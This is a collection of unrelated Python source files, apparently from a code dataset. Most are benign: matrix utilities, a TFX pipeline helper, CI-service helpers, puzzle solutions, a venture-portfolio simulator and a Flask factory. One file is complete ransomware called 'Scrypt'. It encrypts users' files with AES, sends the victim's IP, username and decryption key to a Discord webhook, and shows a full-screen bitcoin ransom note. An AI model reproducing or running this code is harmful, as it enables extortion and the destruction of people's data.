        return Matrix.build(self.shape, lambda i, j: other / self[i][j])
    def __sub__(self, other):
        """Elementwise difference with a same-shaped Matrix, or subtract a scalar."""
        value = None
        if isinstance(other, Matrix):
            if self.shape != other.shape:
                raise ValueError("Matrices must have the same shape")
            value = lambda i, j: self[i][j] - other[i][j]
        else:
            value = lambda i, j: self[i][j] - other
        return Matrix.build(self.shape, value)
    def __truediv__(self, other):
        """Elementwise quotient with a same-shaped Matrix, or divide by a scalar."""
        value = None
        if isinstance(other, Matrix):
            if self.shape != other.shape:
                raise ValueError("Matrices must have the same shape")
            value = lambda i, j: self[i][j] / other[i][j]
        else:
            value = lambda i, j: self[i][j] / other
        return Matrix.build(self.shape, value)
    def reshape(self, shape):
        """Return a new matrix of `shape`, refilled in row-major order.

        NOTE(review): no size check — a larger target shape exhausts the
        iterator mid-build, a smaller one silently drops trailing entries;
        confirm callers only pass size-preserving shapes.
        """
        source = iter(self)
        return Matrix.build(shape, lambda i, j: next(source))
    def transpose(self):
        """Return the transpose (rows become columns)."""
        return Matrix.build(
            (self.shape.columns, self.shape.rows),
            lambda i, j: self[j][i]
        )
    @classmethod
    def build(cls, shape, value):
        """Construct a matrix of `shape` where entry (i, j) is value(i, j)."""
        return cls(array2d(shape, value))
    @classmethod
    def random(cls, shape):
        """Matrix of `shape` with uniform random entries in [0, 1)."""
        return cls.build(shape, lambda i, j: random.random())
    @classmethod
    def zero(cls, shape):
        """Matrix of `shape` with every entry 0."""
        return cls.build(shape, lambda i, j: 0)
| 4,832 | 1,460 |
import os.path
from typing import Any, Iterable, Mapping, Optional, Tuple
import tfx.v1 as tfx
from absl import logging
from ml_metadata.proto import metadata_store_pb2
from tfx.dsl.components.base.base_component import BaseComponent
from tfx.types.channel import Channel
from .base import BasePipelineHelper
from .interface import DEFAULT_CUSTOM_CONFIG, Resources
class LocalPipelineHelper(BasePipelineHelper, arbitrary_types_allowed=True):
    """Pipeline helper that assembles TFX components and runs them locally.

    Trained models are pushed to ``model_push_destination``; ML Metadata is
    kept in a per-pipeline SQLite database under ``output_dir``; execution
    uses the in-process local DAG runner.
    """

    # Destination the Pusher copies models to.
    model_push_destination: tfx.proto.PushDestination

    def construct_trainer(
        self,
        *,
        examples: Optional[Channel] = None,
        transform_graph: Optional[Channel] = None,
        schema: Optional[Channel] = None,
        base_model: Optional[Channel] = None,
        hyperparameters: Optional[Channel] = None,
        run_fn: str,
        train_args: Optional[tfx.proto.TrainArgs] = None,
        eval_args: Optional[tfx.proto.EvalArgs] = None,
        custom_config: Mapping[str, Any] = DEFAULT_CUSTOM_CONFIG,
    ) -> BaseComponent:
        """Build a standard ``tfx.components.Trainer``.

        ``custom_config`` is copied into a fresh dict so the shared default
        mapping is never handed to the component directly.
        """
        return tfx.components.Trainer(
            examples=examples,
            transform_graph=transform_graph,
            schema=schema,
            base_model=base_model,
            hyperparameters=hyperparameters,
            run_fn=run_fn,
            train_args=train_args,
            eval_args=eval_args,
            custom_config=dict(custom_config),
        )

    def construct_tuner(
        self,
        *,
        examples: Channel,
        schema: Optional[Channel] = None,
        transform_graph: Optional[Channel] = None,
        base_model: Optional[Channel] = None,
        tuner_fn: str,
        train_args: Optional[tfx.proto.TrainArgs] = None,
        eval_args: Optional[tfx.proto.EvalArgs] = None,
        custom_config: Mapping[str, Any] = DEFAULT_CUSTOM_CONFIG,
    ) -> BaseComponent:
        """Build a standard ``tfx.components.Tuner``."""
        return tfx.components.Tuner(
            examples=examples,
            schema=schema,
            transform_graph=transform_graph,
            base_model=base_model,
            tuner_fn=tuner_fn,
            train_args=train_args,
            eval_args=eval_args,
            custom_config=dict(custom_config),
        )

    def construct_pusher(
        self,
        *,
        model: Optional[Channel] = None,
        model_blessing: Optional[Channel] = None,
        infra_blessing: Optional[Channel] = None,
        custom_config: Mapping[str, Any] = DEFAULT_CUSTOM_CONFIG,
    ) -> BaseComponent:
        """Build a ``tfx.components.Pusher`` targeting ``model_push_destination``."""
        return tfx.components.Pusher(
            model=model,
            model_blessing=model_blessing,
            infra_blessing=infra_blessing,
            push_destination=self.model_push_destination,
            custom_config=dict(custom_config),
        )

    def get_metadata_connection_config(self) -> metadata_store_pb2.ConnectionConfig:
        """Return an MLMD connection config backed by a per-pipeline SQLite file."""
        metadata_path = os.path.join(
            self.output_dir, "tfx_metadata", self.pipeline_name, "metadata.db"
        )
        logging.info("Pipeline will store metadata in %r", metadata_path)
        return tfx.orchestration.metadata.sqlite_metadata_connection_config(
            metadata_path
        )

    def create_and_run_pipeline(
        self,
        components: Iterable[BaseComponent],
        enable_cache: bool = False,
    ) -> None:
        """Assemble the pipeline from ``components`` and run it synchronously."""
        logging.info(
            "Creating local pipeline name=%r, root=%r, enable_cache=%r",
            self.pipeline_name,
            self.pipeline_root,
            enable_cache,
        )
        metadata_connection_config = self.get_metadata_connection_config()
        pipeline = tfx.dsl.Pipeline(
            pipeline_name=self.pipeline_name,
            pipeline_root=self.pipeline_root,
            components=list(components),
            enable_cache=enable_cache,
            metadata_connection_config=metadata_connection_config,
        )
        # Typo fix in the log message: was "Runnig".
        logging.info("Running pipeline using local DAG runner")
        tfx.orchestration.LocalDagRunner().run(pipeline)
        logging.info("Pipeline run finished")
| 3,975 | 1,138 |
"""Useful utility functions for services."""
import logging
import re
from datetime import datetime, timezone
from inspect import Parameter, Signature
from dateutil.parser import parse
from humanize import naturaldelta, naturaltime
logger = logging.getLogger(__name__)
WORDS = {'1': 'one', '2': 'two', '3': 'three', '4': 'four', '5': 'five',
'6': 'six', '7': 'seven', '8': 'eight', '9': 'nine', '10': 'ten'}
NUMBERS = re.compile(r'\b([1-9]|10)\b')
class Outcome:
    """Possible outcomes for a CI build."""
    # String constants compared against build['outcome'] values elsewhere
    # in this module (see health_summary / estimate_time).
    WORKING = 'working'
    PASSED = 'passed'
    CANCELLED = 'cancelled'
    FAILED = 'failed'
    CRASHED = 'crashed'
def _numeric_words(text):
    """Spell out the whole numbers 1-10 as English words.

    Arguments:
        text (:py:class:`str`): The text to replace numbers in.

    Returns:
        :py:class:`str`: The new text containing words.
    """
    def spell(match):
        return WORDS[match.group()]
    return NUMBERS.sub(spell, text)
def friendlier(func):
    """Wrap *func* so numbers in its string result become words.

    Arguments:
        func: The function to wrap.

    Returns:
        A wrapper function applying :py:func:`_numeric_words`.
    """
    from functools import wraps  # local import keeps module-level deps unchanged

    @wraps(func)  # preserve the wrapped function's name/docstring for introspection
    def wrapper(*args, **kwargs):
        """Wrapper function to apply _numeric_words."""
        result = func(*args, **kwargs)
        try:
            return _numeric_words(result)
        except TypeError:
            # Non-string results (e.g. None) pass through unchanged.
            return result
    return wrapper
naturaldelta = friendlier(naturaldelta) # pylint: disable=invalid-name
naturaltime = friendlier(naturaltime) # pylint: disable=invalid-name
def elapsed_time(start, end):
    """Calculate the elapsed time for a service activity.

    Arguments:
      start (:py:class:`str`): The activity start time.
      end (:py:class:`str`): The activity end time.

    Returns:
      :py:class:`tuple`: The start and end times and humanized elapsed
        time.
    """
    start_time = safe_parse(start)
    end_time = safe_parse(end)
    if start_time is None or end_time is None:
        logger.warning('failed to generate elapsed time')
        text = 'elapsed time not available'
    else:
        # Reuse the already-parsed datetimes. The original re-parsed the raw
        # strings with `parse`, doing the work twice for identical values.
        text = 'took {}'.format(naturaldelta(end_time - start_time))
    return to_utc_timestamp(start_time), to_utc_timestamp(end_time), text
def to_utc_timestamp(date_time):
    """Convert a naive or timezone-aware datetime to UTC timestamp.

    Arguments:
      date_time (:py:class:`datetime.datetime`): The datetime to
        convert.

    Returns:
      :py:class:`int`: The timestamp (in seconds), or None for None input.
    """
    if date_time is None:
        return
    # Naive datetimes (no tzname) are interpreted as UTC before converting.
    if date_time.tzname() is None:
        aware = date_time.replace(tzinfo=timezone.utc)
    else:
        aware = date_time
    return int(round(aware.timestamp(), 0))
def safe_parse(time):
    """Parse a string without throwing an error.

    Arguments:
      time (:py:class:`str`): The string to parse.

    Returns:
      :py:class:`datetime.datetime`: The parsed datetime, or None when
        `time` is None or unparseable.
    """
    if time is None:
        return None
    try:
        parsed = parse(time)
    except (OverflowError, ValueError):
        return None
    return parsed
def occurred(at_):
    """Calculate when a service event occurred.

    Arguments:
      at_ (:py:class:`str`): When the event occurred.

    Returns:
      :py:class:`str`: The humanized occurrence time.
    """
    try:
        event_time = parse(at_)
    except (TypeError, ValueError):
        logger.warning('failed to parse occurrence time %r', at_)
        return 'time not available'
    # Subtracting aware and naive datetimes raises TypeError, so fall back
    # to a naive "now" when the parsed time carries no timezone.
    try:
        delta = datetime.now(tz=timezone.utc) - event_time
    except TypeError:  # at_ is a naive datetime
        delta = datetime.now() - event_time
    return naturaltime(delta.total_seconds())
def health_summary(builds):
    """Summarise the health of a project based on builds.

    Arguments:
      builds (:py:class:`list`): List of builds.

    Returns:
      :py:class:`str`: The health summary.
    """
    # The first build with a decisive outcome wins; working/cancelled
    # builds are skipped over.
    for build in builds:
        outcome = build['outcome']
        if outcome == Outcome.PASSED:
            return 'ok'
        if outcome in (Outcome.CRASHED, Outcome.FAILED):
            return 'error'
    return 'neutral'
def estimate_time(builds):
    """Update the working build with an estimated completion time.

    Takes a simple average over the previous builds, using those
    whose outcome is ``'passed'``.

    Arguments:
      builds (:py:class:`list`): All builds.
    """
    # Only the four most recent builds are scanned for an in-progress one.
    try:
        index, current = next(
            (index, build) for index, build in enumerate(builds[:4])
            if build['outcome'] == 'working'
        )
    except StopIteration:
        return  # no in-progress builds
    if current.get('started_at') is None:
        current['elapsed'] = 'estimate not available'
        return
    # NOTE(review): the comprehension variable shadows `current`; harmless in
    # Python 3 (comprehensions have their own scope) but worth renaming.
    usable = [
        current for current in builds[index + 1:]
        if current['outcome'] == 'passed' and current['duration'] is not None
    ]
    if not usable:
        current['elapsed'] = 'estimate not available'
        return
    # Simple mean of past passed-build durations, in seconds.
    average_duration = int(sum(build['duration'] for build in usable) /
                           float(len(usable)))
    # `started_at` is treated as an epoch timestamp here — presumably the
    # int produced by to_utc_timestamp; confirm against callers.
    finish = current['started_at'] + average_duration
    remaining = (datetime.fromtimestamp(finish) -
                 datetime.now()).total_seconds()
    if remaining >= 0:
        current['elapsed'] = '{} left'.format(naturaldelta(remaining))
    else:
        current['elapsed'] = 'nearly done'
GITHUB_ISSUE = re.compile(r'''
    (?:  # one of:
        fix(?:e(?:s|d))?  # fix, fixes or fixed
        | close(?:s|d)?  # close, closes or closed
        | resolve(?:s|d)?  # resolve, resolves or resolved
    )\s*(?:[^/]+/[^#]+)?  # the account and repository name
    \#\d+  # the issue number
''', re.IGNORECASE | re.VERBOSE)  # flags are bitmasks: combine with |, not +
"""Pattern for commit comment issue ID format, per `GitHub documentation`_.

.. _GitHub documentation: https://help.github.com/articles/closing-issues-via-commit-messages/
"""
TRACKER_STORY = re.compile(r'''
    \[(?:
        (?:
            finish(?:e(?:s|d))?  # finish, finishes or finished
            | complete(?:s|d)?  # complete, completes or completed
            | fix(?:e(?:s|d))?  # fix, fixes or fixed
        )?
        \s*\#\d+\s*  # the story ID
    )+\]
''', re.IGNORECASE | re.VERBOSE)  # | instead of +: idempotent and idiomatic
"""Pattern for commit hook story ID format, per `Tracker documentation`_.

.. _Tracker documentation: https://www.pivotaltracker.com/help/api/rest/v5#Source_Commits
"""
def remove_tags(commit_message):
    """Remove issue/tracker tags from a commit message.

    Note:
      Currently implemented for :py:class:`~.Tracker` and
      :py:class:`~.GitHub` commit messages.

    Arguments:
      commit_message (:py:class:`str`): The commit message.

    Returns:
      :py:class:`str`: The message with tags removed.
    """
    stripped = GITHUB_ISSUE.sub('', commit_message)
    stripped = TRACKER_STORY.sub('', stripped)
    return stripped.strip()
def required_args(attrs):
    """Extract the required arguments from a class's attrs.

    Arguments:
      attrs (:py:class:`dict`): The attributes of a class.

    Returns:
      :py:class:`set`: The required arguments (keyword-only ``__init__``
        parameters without defaults, unioned with any ``REQUIRED`` attr).
    """
    # The original aliased init_args and attr_args to the *same* set object;
    # both were rebound before mutation so it was harmless, but the aliasing
    # was an accident waiting to happen.
    init_args = set()
    attr_args = set()
    if '__init__' in attrs:
        sig = Signature.from_callable(attrs['__init__'])
        init_args = {
            name
            for name, param in sig.parameters.items()
            if param.kind == Parameter.KEYWORD_ONLY
            and param.default is Signature.empty
        }
    if 'REQUIRED' in attrs:
        attr_args = attrs['REQUIRED']
    return set.union(attr_args, init_args)
def provided_args(attrs):
    """Extract the provided arguments from a class's attrs.

    Arguments:
      attrs (:py:class:`dict`): The attributes of a class.

    Returns:
      :py:class:`set`: The provided arguments (empty set when absent).
    """
    if 'PROVIDED' in attrs:
        return attrs['PROVIDED']
    return set()
| 7,956 | 2,473 |
class Solution:
    def trapRainWater(self, heightMap: List[List[int]]) -> int:
        """Volume of water trapped on a 2-D elevation map.

        Heap-based flood fill: start from the border cells, repeatedly pop
        the lowest boundary cell and expand inward, raising the water line
        to the running boundary height.
        """
        if not any(heightMap):
            return 0
        rows, cols = len(heightMap), len(heightMap[0])
        seen = set()
        boundary = []
        # Seed the frontier with every border cell.
        for r in range(rows):
            for c in range(cols):
                if r in (0, rows - 1) or c in (0, cols - 1):
                    boundary.append((heightMap[r][c], r, c))
                    seen.add((r, c))
        heapq.heapify(boundary)
        total = 0
        while boundary:
            height, r, c = heapq.heappop(boundary)
            for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1)):
                nr, nc = r + dr, c + dc
                if 0 <= nr < rows and 0 <= nc < cols and (nr, nc) not in seen:
                    seen.add((nr, nc))
                    cell = heightMap[nr][nc]
                    if height > cell:
                        total += height - cell
                    heapq.heappush(boundary, (max(height, cell), nr, nc))
        return total
| 1,084 | 400 |
# Advent of Code 2020, day 16 ("Ticket Translation").
import utils
m = utils.opener.raw("input/16.txt")
# Input has three blank-line-separated sections: rules, my ticket, nearby tickets.
rm, tm, om = m.split("\n\n")
rules = {}
for line in rm.split("\n"):
    name, expr = line.split(": ")
    # Each rule is two inclusive ranges, e.g. "1-3 or 5-7" -> [[1, 3], [5, 7]].
    rules[name] = [[int(q) for q in x.split("-")] for x in expr.split(" or ")]
myticket = [int(x) for x in tm.split("\n")[1].split(",")]
# All tickets: my own plus the nearby ones. The [1:-1] presumably drops the
# section header and a trailing empty line from the final newline — confirm
# the input file ends with "\n".
tickets = [[int(q) for q in x.split(",")] for x in tm.split("\n")[1:] + om.split("\n")[1:-1]]
s1 = 0
# Part 1: sum values that satisfy no rule at all, and drop those tickets.
# Iterate over a copy (tickets[:]) because invalid tickets are removed
# from the original list mid-loop.
for t in tickets[:]:
    for v in t:
        if not any([r[0][0] <= v <= r[0][1] or r[1][0] <= v <= r[1][1] for r in rules.values()]):
            s1 += v
            tickets.remove(t)
print("1:", s1)
possible = {}
# Part 2: start with every field position possible for every rule...
for rule in rules:
    possible[rule] = set(range(len(myticket)))
# ...then eliminate positions whose value violates the rule on any valid ticket.
for t in tickets:
    for i, v in enumerate(t):
        for rname, r in rules.items():
            if not (r[0][0] <= v <= r[0][1] or r[1][0] <= v <= r[1][1]):
                if i in possible[rname]:
                    possible[rname].remove(i)
found = {}
# Repeatedly fix a rule and remove its position from the rest.
# NOTE(review): min() over sets compares by subset ordering, which is only a
# partial order — presumably intended to pick the singleton candidate set
# each round; verify this holds for the puzzle input.
while possible:
    k, v = min(possible.items(), key=lambda item: item[1])
    found[k] = list(v)[0]
    del possible[k]
    for val in possible.values():
        val.remove(found[k])
s2 = 1
# Answer: product of my ticket's values for all "departure*" fields.
for k, v in found.items():
    if k.startswith("departure"):
        s2 *= myticket[v]
print("2:", s2)
from collections import Counter
import random
import math
###
# Parameters of assumptions
###
# How many initial investments and avg check size
num_seed_rounds = 50
invested_per_seed_round = 0.5
# Probabilities of different outcomes (prob, outcome multiple)
outcome_probs_seed = [ [0.01, 100], # N% chance of Mx return
[0.03, 20],
[0.03, 10],
[0.03, 6],
[0.25, 1],
[0.65, 0]]
follow_on_pct = 0.5 # % of deals in which fund invests in next round
invested_per_follow_on = 1.0 # avg size of follow-on investment
outcome_probs_follow = [ [0.02, 30],
[0.06, 15],
[0.06, 8],
[0.06, 4],
[0.30, 1],
[0.50, 0]]
# number of simulated portfolios to generate
num_simulations = 10000
# constants
fund_size = (num_seed_rounds * invested_per_seed_round) +\
(num_seed_rounds * follow_on_pct * invested_per_follow_on)
###
# Classes
###
class Investment:
    """A single check written by the fund: amount in plus outcome multiple."""
    def __init__(self, amt_in, outcome, is_seed=True):
        self.is_seed = is_seed
        self.amt_in = amt_in
        self.outcome = outcome
    @property
    def amt_out(self):
        """Cash returned: the outcome multiple applied to the amount invested."""
        return self.outcome * self.amt_in
class Portfolio:
    """A basket of Investment objects with aggregate return statistics."""
    def __init__(self, investments):
        self.investments = investments
    @property
    def total_invested(self):
        """Total capital deployed across all investments."""
        return sum(deal.amt_in for deal in self.investments)
    @property
    def total_returned(self):
        """Total capital returned across all investments."""
        return sum(deal.amt_out for deal in self.investments)
    @property
    def return_multiple(self):
        """Fund-level multiple: dollars out over dollars in."""
        return (self.total_returned * 1.0) / self.total_invested
    def __str__(self):
        seed_deals = [deal for deal in self.investments if deal.is_seed]
        follow_deals = [deal for deal in self.investments if not deal.is_seed]
        l = ['invested: %s' % self.total_invested,
             'returned: %s' % self.total_returned,
             'return_multiple %s' % self.return_multiple,
             'num_deals_total %s' % len(self.investments),
             'num_deals_seed %s' % len(seed_deals),
             'num_deals_follow %s' % len(follow_deals),
             ]
        return '%s' % l
###
# Funcs
##
def validate_params():
    """Sanity-check that each outcome table's probabilities sum to exactly 1."""
    seed_total = sum(entry[0] for entry in outcome_probs_seed)
    if seed_total != 1.0:
        raise Exception("Seed probabilities don't add to 1! ")
    follow_total = sum(entry[0] for entry in outcome_probs_follow)
    if follow_total != 1.0:
        raise Exception("Follow on probabilities don't add to 1! ")
def create_portfolio():
    """Simulate one fund's portfolio.

    Makes `num_seed_rounds` seed investments, then follows on in roughly
    `follow_on_pct` of them. Each outcome multiple is drawn from the
    cumulative distributions in outcome_probs_seed / outcome_probs_follow.

    Returns:
        Portfolio: the simulated portfolio.
    """
    investments = []
    # Seed rounds
    for i in range(0, num_seed_rounds):
        r = random.random()
        prob_sum = 0
        # Walk the cumulative distribution until the draw lands in a bucket.
        for (cur_prob, cur_outcome) in outcome_probs_seed:
            prob_sum += cur_prob
            if (r <= prob_sum):
                investments.append(Investment(invested_per_seed_round, cur_outcome))
                break
    # Follow on
    for i in range(0, num_seed_rounds):
        if (random.random() > follow_on_pct):
            continue # did not follow on
        r = random.random() # for now, make them uncorrelated
        prob_sum = 0
        for (cur_prob, cur_outcome) in outcome_probs_follow:
            prob_sum += cur_prob
            if (r <= prob_sum):
                investments.append(Investment(invested_per_follow_on, cur_outcome, is_seed=False))
                # Bug fix: without this break, every later bucket also passed
                # the cumulative test (prob_sum only grows), so one follow-on
                # deal was recorded once per remaining bucket — up to six
                # investments. The seed loop above already broke correctly.
                break
    return Portfolio(investments)
def run_simulations(num_iters):
    """Create `num_iters` simulated portfolios and print their return distribution."""
    portfolios = [create_portfolio() for _ in range(num_iters)]
    # print a few, for debugging
    print('Sample portfolios:')
    for sample in portfolios[0:10]:
        print(' P: %s' % sample)
    print('# of portfolios with different multiple returns')
    whole_multiples = Counter(math.floor(p.return_multiple) for p in portfolios)
    for ret, cnt in sorted(whole_multiples.items()):
        pct = 100 * ((cnt * 1.0) / num_iters)
        print(' %sx - %s (%0.0f%%)' % (ret, cnt, pct))
    print('# of portfolios with different multiple returns (to 0.1x)')
    tenth_multiples = Counter(round(p.return_multiple, 1) for p in portfolios)
    cum_pct = 0
    for ret, cnt in sorted(tenth_multiples.items()):
        pct = 100 * ((cnt * 1.0) / num_iters)
        cum_pct += pct
        stars = '*' * int(pct * 10)
        print(' %sx - %s (%0.0f%%) (%0.0f%%) %s' % (ret, cnt, pct, cum_pct, stars))
###
# main()
###
if __name__ == "__main__":
    # for dev
    # random.seed(31331)
    print('starting...')
    print('validating params...')
    validate_params()
    print('Parameters')
    print(' $%0.0fm fund which makes %s $%sm seed investments.' %\
        ( fund_size, num_seed_rounds, invested_per_seed_round))
    print(' Follows on with $%sm, %s of the time.' % (invested_per_follow_on, follow_on_pct))
    print('')
    # Typo fix in the user-facing message: was "simluation".
    print('Running portfolio simulation...')
    run_simulations(num_simulations)
    print('done.')
| 4,931 | 1,750 |
import numpy as np
def dice_ratio(pred, label):
    """Dice similarity coefficient of two binary masks.

    Note: pred & label should only contain 0 or 1.
    """
    intersection = np.sum(pred[label == 1])
    return 2.0 * intersection / (np.sum(pred) + np.sum(label))
import PyQt5
import PyQt5.QtWidgets
import PyQt5.QtCore
import sys
import requests
import random
import string
import threading
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import os
import shutil
btcAdd = ""
email = ""
discordWebhook = ""
fileTypes = ['.txt','.exe','.php','.pl','.7z','.rar','.m4a','.wma','.avi','.wmv','.csv','.d3dbsp','.sc2save','.sie','.sum','.ibank','.t13','.t12','.qdf','.gdb','.tax','.pkpass','.bc6','.bc7','.bkp','.qic','.bkf','.sidn','.sidd','.mddata','.itl','.itdb','.icxs','.hvpl','.hplg','.hkdb','.mdbackup','.syncdb','.gho','.cas','.svg','.map','.wmo','.itm','.sb','.fos','.mcgame','.vdf','.ztmp','.sis','.sid','.ncf','.menu','.layout','.dmp','.blob','.esm','.001','.vtf','.dazip','.fpk','.mlx','.kf','.iwd','.vpk','.tor','.psk','.rim','.w3x','.fsh','.ntl','.arch00','.lvl','.snx','.cfr','.ff','.vpp_pc','.lrf','.m2','.mcmeta','.vfs0','.mpqge','.kdb','.db0','.mp3','.upx','.rofl','.hkx','.bar','.upk','.das','.iwi','.litemod','.asset','.forge','.ltx','.bsa','.apk','.re4','.sav','.lbf','.slm','.bik','.epk','.rgss3a','.pak','.big','.unity3d','.wotreplay','.xxx','.desc','.py','.m3u','.flv','.js','.css','.rb','.png','.jpeg','.p7c','.p7b','.p12','.pfx','.pem','.crt','.cer','.der','.x3f','.srw','.pef','.ptx','.r3d','.rw2','.rwl','.raw','.raf','.orf','.nrw','.mrwref','.mef','.erf','.kdc','.dcr','.cr2','.crw','.bay','.sr2','.srf','.arw','.3fr','.dng','.jpeg','.jpg','.cdr','.indd','.ai','.eps','.pdf','.pdd','.psd','.dbfv','.mdf','.wb2','.rtf','.wpd','.dxg','.xf','.dwg','.pst','.accdb','.mdb','.pptm','.pptx','.ppt','.xlk','.xlsb','.xlsm','.xlsx','.xls','.wps','.docm','.docx','.doc','.odb','.odc','.odm','.odp','.ods','.odt','.sql','.zip','.tar','.tar.gz','.tgz','.biz','.ocx','.html','.htm','.3gp','.srt','.cpp','.mid','.mkv','.mov','.asf','.mpeg','.vob','.mpg','.fla','.swf','.wav','.qcow2','.vdi','.vmdk','.vmx','.gpg','.aes','.ARC','.PAQ','.tar.bz2','.tbk','.bak','.djv','.djvu','.bmp','.cgm','.tif','.tiff','.NEF','.cmd','.class','.jar','.java','.asp','.brd','.sch','.dch','.dip','.vbs','.asm','.pas','.ldf','.ibd','.MYI','.MYD','.frm','.dbf','.SQLITEDB','.SQLITE3','.asc','.lay6','.lay','.ms11(Securitycopy)','.sldm','.sldx','.ppsm','.ppsx','.ppam','.docb','.mml','.sxm','.otg','.slk','.xlw','.xlt','.x
lm','.xlc','.dif','.stc','.sxc','.ots','.ods','.hwp','.dotm','.dotx','.docm','.DOT','.max','.xml','.uot','.stw','.sxw','.ott','.csr','.key','wallet.dat']
class Ransomware(PyQt5.QtCore.QRunnable):
def __init__(self):
super(Ransomware, self).__init__()
self.threadpool = PyQt5.QtCore.QThreadPool()
self.randomId = self.rID(12)
self.encryptionPass = self.rSeed(32)
self.filePath = "C:\\Users\\"
self.ip = ""
self.userName = ""
self.crypto = AES.new(self.encryptionPass.encode(), AES.MODE_ECB)
def readMe(self):
try:
f = open(f"C:\\Users\\{self.userName}\\Desktop\\readme.txt","w+")
f.write(note)
except:
pass
def getUserDetails(self):
try:
self.ip = requests.get("https://api.ipify.org?format=json").json()["ip"]
self.userName = os.getlogin()
except:
pass
def encryptFile(self, file):
try:
with open(file, 'rb') as infile:
content = self.crypto.encrypt(pad(infile.read(),32))
with open(file, "wb") as outfile:
outfile.write(content)
outfile.close()
except:
pass
def run(self):
self.sendMessage()
for root, directories, files in os.walk(self.filePath):
for filename in files:
filepath = os.path.join(root, filename)
for base in fileTypes:
if base in filepath:
threading.Thread(target=self.encryptFile, args=(filepath,)).start()
self.readMe()
def sendMessage(self):
try:
self.getUserDetails()
except:
pass
data = {
"embeds": [
{
"title": "**__Victim Report__:**",
"description": f"```css\nUSERID: {self.randomId}``` ```css\nKEY: {self.encryptionPass}``` ```css\nUSERNAME: {self.userName}``` ```css\nIP: {self.ip}```",
"color": 13959168,
"thumbnail": {
"url": "https://www.pngkit.com/png/full/168-1680567_69137579-pentagram-with-demon-baphomet-satanic-goat.png"
},
"author": {
"name": "Scrypt",
"icon_url": "https://i.imgur.com/F3j7z5K.png"
}
}
]
}
r = requests.post(discordWebhook, json=data)
def rSeed(self, stringLength):
password_characters = string.ascii_letters
return ''.join(random.choice(password_characters) for i in range(stringLength))
def rID(self, stringLength):
password_characters = string.ascii_letters + string.digits
return ''.join(random.choice(password_characters) for i in range(stringLength))
class Scrypt(PyQt5.QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.threadpool = PyQt5.QtCore.QThreadPool()
self.initUI()
self.banner()
self.cont()
self.readMe()
self.show()
self.threadpool.start(Ransomware())
def initUI(self):
self.setWindowFlags(PyQt5.QtCore.Qt.WindowCloseButtonHint | PyQt5.QtCore.Qt.WindowType_Mask)
self.showFullScreen()
self.banner()
self.setStyleSheet("""
QMainWindow{
background-color: #212121;
}
""")
def cont(self):
btn = PyQt5.QtWidgets.QPushButton('Continue', self)
btn.resize(750,50)
btn.move((self.frameGeometry().width())/3.35, 900)
btn.setStyleSheet("""
QPushButton{
background-color: #d50000;
border-radius: 7.5px;
font-weight: 1200;
font-size: 18px;
}
QPushButton::hover {
background-color: #9b0000;
}
""")
btn.show()
btn.clicked.connect(self.hide)
def readMe(self):
rm = PyQt5.QtWidgets.QLabel(ransomNote, self)
rm.setStyleSheet("""
QLabel{
background-color: #d50000;
color: #000000;
border: 2px solid #ff5131;
border-radius: 7.5px;
font-weight: 1200;
font-size: 18px;
}
""")
rm.resize(750,650)
rm.move(self.frameGeometry().width()/3.35, 220)
rm.setAlignment(PyQt5.QtCore.Qt.AlignCenter)
rm.show()
def banner(self):
flair = PyQt5.QtWidgets.QLabel('Scrypt', self)
flair.setStyleSheet("""
QLabel{
background-color: #d50000;
color: #000000;
border: 2px solid #ff5131;
border-radius: 7.5px;
font-weight: 1400;
font-size: 45px;
}
""")
flair.resize(800,130)
flair.move(self.frameGeometry().width()/3.5, 50)
flair.setAlignment(PyQt5.QtCore.Qt.AlignCenter)
flair.show()
@PyQt5.QtCore.pyqtSlot()
def hide(self):
self.setWindowOpacity(0)
detailedNote =f"""
-------------------------------------------------------------------------------------------------------------------------
Hello,\n
If you are reading this then you have likely been hit by Scrypt Ransomware\n
We apologize for the incovience, at the end of the day we just want to get paid\n
In order to receive the decrypter you must follow the following steps to truely recover\n
all your files.\n
1. Download BitPay: https://bitpay.com/wallet/ if you are using a different wallet thats fine.\n
2. Send $50 to this address: {btcAdd}\n
3. After sending it wait for a confirmation and send us an email and include your UniqueID: {Ransomware().randomId}\n
4. Wait shortly, you will receive an email with your decrypter once everything is handled.\n
5. If we do not receive payment within 2 weeks we will no longer be handeling support.
-------------------------------------------------------------------------------------------------------------------------
"""
ransomNote = f"""
All Your Files Have Been Encrypted\n
At the end of the day we just want to get paid\n
Here are the instructions to get getting your files back\n
1. Pay $50 btc to the listed address\n
2. Send an email and include your unique id\n
3. Wait\n
------------------------------------\n
Check your desktop for readme.txt if you are lost!\n
------------------------------------\n
BTC Address: {btcAdd}\n
Email: {email}\n
UniqueID: {Ransomware().randomId}\n
------------------------------------\n
Click the Button Below To Continue:
(Killing this program will result in a full lose of files)\n
"""
if __name__ == "__main__":
app = PyQt5.QtWidgets.QApplication(sys.argv)
l = Scrypt()
sys.exit(app.exec())
| 8,408 | 3,828 |
import os
from flask import Blueprint, Flask
def create_app(opts=None):
    """Application factory for the Flask app.

    Arguments:
        opts: Optional configuration mapping. Currently unused by the
            factory body; kept for interface compatibility. Defaults to
            None instead of a mutable ``{}``, which would be a single
            shared dict across all calls.
    """
    opts = {} if opts is None else opts
    app = Flask(__name__)
    # We will learn how to store our secrets properly in a few short weeks.
    # In the meantime, we'll use this:
    app.config['SECRET_KEY'] = os.getenv('SECRET_KEY') or "Don't ever store secrets in your actual code"
    # For local debugging purposes. Not ideal for production environments:
    app.config['TEMPLATES_AUTO_RELOAD'] = True
    app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
    from .simple_photo_processor import spp as spp_blueprint
    app.register_blueprint(spp_blueprint)
    return app
from datetime import datetime
from unittest import TestCase
from dateutil.tz import UTC
from src.DateUtils import get_start_of_year, get_start_of_year_after, date_to_string, date_and_time_to_string
class TestDateUtils(TestCase):
    """Unit tests for the date helpers in src.DateUtils."""

    def test_get_start_of_year(self):
        expected = datetime(2018, 1, 1, tzinfo=UTC)
        self.assertEqual(expected, get_start_of_year(2018))

    def test_get_start_of_year_after(self):
        expected = datetime(2019, 1, 1, tzinfo=UTC)
        self.assertEqual(expected, get_start_of_year_after(2018))

    def test_date_to_string(self):
        new_year = datetime(2018, 1, 1, tzinfo=UTC)
        self.assertEqual("01.01.2018", date_to_string(new_year))

    def test_date_and_time_to_string(self):
        new_year = datetime(2018, 1, 1, tzinfo=UTC)
        self.assertEqual("01.01.2018 00:00:00 UTC",
                         date_and_time_to_string(new_year))
| 845 | 371 |
